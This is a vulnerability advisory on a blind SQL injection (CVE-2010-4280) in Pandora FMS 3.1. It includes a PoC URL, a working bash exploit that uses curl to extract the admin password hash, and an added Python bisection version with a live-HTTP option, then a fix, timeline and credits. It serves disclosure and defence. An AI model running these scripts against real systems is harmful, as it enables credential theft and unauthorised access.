[+] Introduction
Pandora FMS (Pandora Flexible Monitoring System) is a software solution for
monitoring computer networks. It gives a visual view of the status and
performance of parameters from different operating systems, servers,
applications and hardware systems such as firewalls, proxies, databases,
web servers or routers.
It can be deployed on almost any operating system. It offers remote
monitoring (WMI, SNMP, TCP, UDP, ICMP, HTTP...) and it can also use agents;
an agent is available for each platform. It can also monitor hardware
devices with a TCP/IP stack, such as load balancers, routers, network
switches, printers or firewalls.
The software consists of several servers that gather and process information
from different sources: a WMI server for collecting remote Windows
information, a predictive server, a plug-in server that runs complex
user-defined network tests, an export server to replicate data between
different Pandora FMS sites, a network discovery server, and an SNMP trap
console.
Pandora FMS is free software, released under the terms of the GNU General
Public License.
4) Blind SQL Injection - CVE-2010-4280 - CVSS: 8.5/10
The group_id parameter of operation/agentes/estado_agente.php is vulnerable
to boolean-based blind SQL injection: the injected condition decides whether
the agent table is rendered, so the presence or absence of a string from that
table (the PoC script below greps for "Interval") acts as the oracle.
PoC:
http://host/pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=24%29%20and%20%28select%20password%20from%20tusuario%20where%20ord%28substring%28password,1,1%29%29=49%20and%20id_user=0x61646d696e%29%20union%20select%20id_agente,%20nombre%20from%20tagente%20where%20id_grupo%20in%20%281
Decoded, the injected group_id value is:
24) and (select password from tusuario where ord(substring(password,1,1))=49 and id_user=0x61646d696e) union select id_agente, nombre from tagente where id_grupo in (1
It closes the original IN( list, tests whether the first character of the
password hash of the user 0x61646d696e ('admin' as a hex string literal, so no
quotes are needed) is '1' (ASCII 49), and appends a harmless UNION so that the
page still renders when the condition is true.
Exploit:
#!/bin/bash
# Pandora Flexible Monitoring System Blind SQL Injection PoC
# Juan Galiana Lara
# Gets the md5 hash password from a specific user
#
# Configure HOST, COOKIE and GROUP_ID before using it.
# Usage:
# $ ./getpassword.sh
# 74b444ff2785ea8bb9ae02c13b6a71f1
HOST="HOST"
TARGET_USER="0x61646d696e" # 'admin' as a hex string literal (no quotes needed in the query)
PATTERN="Interval"         # present in the response only when the injected condition is true
COOKIE="rq842tci6e5ib7t918c6sv1ml4" # PHPSESSID of an authenticated session
CHARSET=(0 1 2 3 4 5 6 7 8 9 a b c d e f g h i j k l m n o p q r s t u v w x y z)
GROUP_ID=2
j=1
# One position of the 32-character md5 hex hash per outer iteration
while [[ $j -lt 33 ]]; do
i=0
# Try each charset character until the page reports a match
while [[ $i -lt ${#CHARSET[@]} ]]; do
c=$(printf '%d' "'${CHARSET[$i]}")   # ASCII code of the candidate character
URL="http://$HOST/pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=$GROUP_ID%29%20and%20%28select%20password%20from%20tusuario%20where%20ord%28substring%28password,$j,1%29%29=$c%20and%20id_user=$TARGET_USER%29%20union%20select%20id_agente,%20nombre%20from%20tagente%20where%20id_grupo%20in%20%281"
curl "$URL" --cookie "PHPSESSID=$COOKIE" 2> /dev/null | grep -q "$PATTERN"
if [ $? -eq 0 ]; then echo -n "${CHARSET[$i]}"; break; fi
let i++
done
# No candidate matched: wrong cookie, wrong GROUP_ID or the page has changed
if [[ $i -eq ${#CHARSET[@]} ]]; then echo "Something went wrong!"; exit 1; fi
let j++
done
echo
exit 0
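The script above spends up to 36 requests per character, trying each charset value in turn. The following Python script is an added example (not part of the original advisory and not Pandora FMS code) that generalises the same boolean oracle to a binary search on ord(), so each character costs at most 7 requests, and runs it offline against a constructed stand-in for the vulnerable page. The host name pandora.example, the fake_console responder, the users table and the helper names are assumptions; make_http_oracle shows how the same check would be issued against a live console with the PHPSESSID cookie, as the bash PoC does, but is not exercised here.

```python
from __future__ import annotations

import re
import urllib.parse
import urllib.request
from typing import Callable

# String present in the rendered agent table only when the injected condition
# is true (the same oracle the advisory's bash PoC greps for).
PATTERN = "Interval"
ADMIN_HEX = "0x" + b"admin".hex()   # 0x61646d696e, the advisory's TARGET_USER

Oracle = Callable[[int, str, int], bool]   # (position, operator, value) -> condition held?


def build_payload(group_id: int, user_hex: str, pos: int, op: str, value: int) -> str:
    """The advisory's injection with the comparison operator made configurable."""
    return (
        f"{group_id}) and (select password from tusuario where "
        f"ord(substring(password,{pos},1)){op}{value} and id_user={user_hex}) "
        f"union select id_agente, nombre from tagente where id_grupo in (1"
    )


def build_url(host: str, group_id: int, user_hex: str, pos: int, op: str, value: int) -> str:
    query = urllib.parse.urlencode({
        "sec": "estado",
        "sec2": "operation/agentes/estado_agente",
        "group_id": build_payload(group_id, user_hex, pos, op, value),
    })
    return f"http://{host}/pandora_console/index.php?{query}"


# Matches build_payload's output; used only by the constructed stand-in below.
_PAYLOAD_RE = re.compile(
    r"(\d+)\) and \(select password from tusuario where "
    r"ord\(substring\(password,(\d+),1\)\)(=|>)(\d+) and id_user=0x([0-9a-f]+)\) "
    r"union select id_agente, nombre from tagente where id_grupo in \(1"
)


def fake_console(url: str, users: dict[str, str]) -> str:
    """Constructed stand-in for the vulnerable page (assumption, not Pandora FMS code).

    Evaluates the injected subselect the way MySQL would and returns a body that
    contains PATTERN only when the condition holds.
    """
    qs = urllib.parse.parse_qs(urllib.parse.urlsplit(url).query)
    m = _PAYLOAD_RE.fullmatch(qs.get("group_id", [""])[0])
    if not m:
        return "<html>error</html>"
    _, pos, op, value, user_hex = m.groups()
    password = users.get(bytes.fromhex(user_hex).decode("ascii", "replace"), "")
    # MySQL: substring() past the end gives '' and ord('') is 0, so nothing matches.
    code = ord(password[int(pos) - 1]) if int(pos) <= len(password) else 0
    hit = code == int(value) if op == "=" else code > int(value)
    return f"<html><table><th>{PATTERN}</th></table></html>" if hit else "<html>no agents</html>"


def make_simulated_oracle(users: dict[str, str], host: str, group_id: int, user_hex: str) -> Oracle:
    def check(pos: int, op: str, value: int) -> bool:
        return PATTERN in fake_console(build_url(host, group_id, user_hex, pos, op, value), users)
    return check


def make_http_oracle(host: str, cookie: str, group_id: int, user_hex: str) -> Oracle:
    """Same check against a live console, sending PHPSESSID like the bash PoC (not run here)."""
    def check(pos: int, op: str, value: int) -> bool:
        req = urllib.request.Request(build_url(host, group_id, user_hex, pos, op, value),
                                     headers={"Cookie": f"PHPSESSID={cookie}"})
        with urllib.request.urlopen(req, timeout=10) as resp:
            return PATTERN in resp.read().decode("utf-8", "replace")
    return check


def extract_hash(check: Oracle, length: int = 32) -> tuple[str, int]:
    """Recover the md5 hex hash one character at a time by bisecting on ord().

    Returns (hash, request_count). Bisection over printable ASCII (95 values)
    needs at most 7 oracle queries per character instead of up to 36.
    """
    recovered, requests = "", 0
    for pos in range(1, length + 1):
        lo, hi = 32, 126            # the true code always stays inside [lo, hi]
        while lo < hi:
            mid = (lo + hi) // 2
            requests += 1
            if check(pos, ">", mid):
                lo = mid + 1
            else:
                hi = mid
        ch = chr(lo)
        if ch not in "0123456789abcdef":
            # Unknown user, NULL password or a broken oracle: every comparison is
            # false in MySQL and the search collapses to chr(32).
            raise RuntimeError(f"position {pos}: recovered {ch!r}, not an md5 hex digit")
        recovered += ch
    return recovered, requests


if __name__ == "__main__":
    # Constructed sample data: the hash from the advisory's usage note as admin's password.
    users = {"admin": "74b444ff2785ea8bb9ae02c13b6a71f1"}
    print(*extract_hash(make_simulated_oracle(users, "pandora.example", 2, ADMIN_HEX)))
```

Swapping make_simulated_oracle for make_http_oracle turns this into a live extraction; the bisection needs a `>` comparison, which MySQL's ord() supports, and the RuntimeError replaces the bash script's "Something went wrong!" exit.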
The vendor's fix for this class of issue was a generic filter against SQL
injection applied to incoming parameters; a proper fix is planned for a future
major version. A generic filter is a blacklist and should be treated as a
mitigation rather than a fix: the durable correction is to pass untrusted
values such as group_id through parameterised queries, or, for a numeric ID,
to cast them to an integer before they reach the query.
[+] Impact
An attacker can execute operating system commands, inject remote code in the
context of the application, read arbitrary files from the filesystem, or
extract any data from the database, including passwords and confidential
information about the monitored network and systems. It is also possible to
bypass authentication or escalate privileges to become admin, gaining full
control of the web application and the web server. These vulnerabilities have
a high impact on the confidentiality, integrity and availability of the
system.
[+] Systems affected
Versions up to and including 3.1 of Pandora FMS are affected.
[+] Solution
Apply the security fix for version 3.1:
http://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download
Or upgrade to version 3.1.1 from
http://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/3.1.1/
[+] Timeline
Aug 2010: First contact with vendor
Aug 2010: Vendor confirmation
Sept 2010: Second contact: SQL Injection vulnerabilities
Sept 2010: Confirmation that the fix will be released in October
Oct 2010: Pandora FMS security patch for version 3.1 released
Oct 2010: Request for CVE numbers
Nov 2010: Pandora FMS version 3.1.1 released
Nov 2010: Disclosure of this advisory
[+] References
Official PandoraFMS site: http://pandorafms.org/
SourceForge PandoraFMS site: http://sourceforge.net/projects/pandora/
Wikipedia entry about PandoraFMS: http://en.wikipedia.org/wiki/Pandora_FMS
Common Vulnerability Scoring System (CVSS) v2 calculator:
http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2
Common Vulnerabilities and Exposures (CVE): http://cve.mitre.org/
[+] Credits
These vulnerabilities were discovered by Juan Galiana Lara -
@jgaliana - http://juangaliana.blogspot.com/